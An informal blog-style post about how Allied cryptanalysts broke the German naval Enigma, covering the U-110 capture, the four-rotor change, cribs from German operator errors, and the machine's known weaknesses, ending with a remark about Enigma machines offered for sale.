After the English had boarded the U-110 [thanks Fritz-Julius Lemp for being a pussy!] and got their hands on a working Enigma [with all dials in the correct setting for the whole month], they where able to destroy lots of U boats that where decimating the US-UK ships. Admiral Doenitz just knew something was wrong and made a change by added a thin fourth rotor between the leftmost rotor and the reflecting plate.

Bletchley Park learned of the impending change from decrypts and captured material, but until it was actually implemented there was little they could do to prepare. Fortunately, the Germans made an error. In December 1941, before the change had been made official, a U-boat sent a message using the four-rotor machine. To compound the mistake, the same message was retransmitted using only three rotors. From this seemingly innocuous error, the cryptanalysts at BP determined the wiring of the fourth rotor. :P

In order to set up the U.S. Navy Bombe, cryptanalysts first had to determine a "crib." A crib is the unenciphered text that is assumed, or known, to appear in the message.

Cribs could come through a variety of methods. Some of the best cribs came from errors made by the Germans themselves. On more than one occasion, a German signal clerk sent the same message twice in two different codes. If the code for one was known, it provided a crib for the unknown system.

Another frequent German mistake came in standardized messages. For example, a shore weather station in the Bay of Biscay sent out a message every day at 07:00 which began, "The weather in the Bay of Biscay will be. . . ." Knowing the exact wording of a message made a perfect crib for the Allies, so it became a high priority to intercept the daily message from this weather station.

A final example of a common German error involved the practice of submerged U-boats. When the submarines resurfaced after extended periods of time under water, they requested all the important messages they had missed while below the waves. The transmissions that followed inevitably involved communications previously sent and deciphered. Cryptanalysts merely checked the back files for messages with the same number of letter groups and used them as cribs for the new message. Since the resulting message would be identical to the previous one, it helped reveal the Enigma setting for the current day. With the daily setting, all the current day's messages could be read.

Other cribs came from knowing the current activities of the enemy. If, for example, a battle occurred, it could be assumed that messages following the attack reported on the battle. It was more difficult for the cryptanalysts to build cribs for these types of messages since it involved guesswork.

Because the Enigma rotors moved with each keystroke, a letter typed twice usually enciphered to two different letters. Also, the Enigma could not encrypt a letter to itself. Finally, the Germans indicated a space between words with the letter X and spelled out numbers.

Knowing these details played an important role in ultimately breaking the Enigma's daily settings.

Now why do we see these same weaknesses made over and over again?

Sometime ago there was one for sale too. Damn that would have been the hottest geek present ever. Prices have not been too extreme either...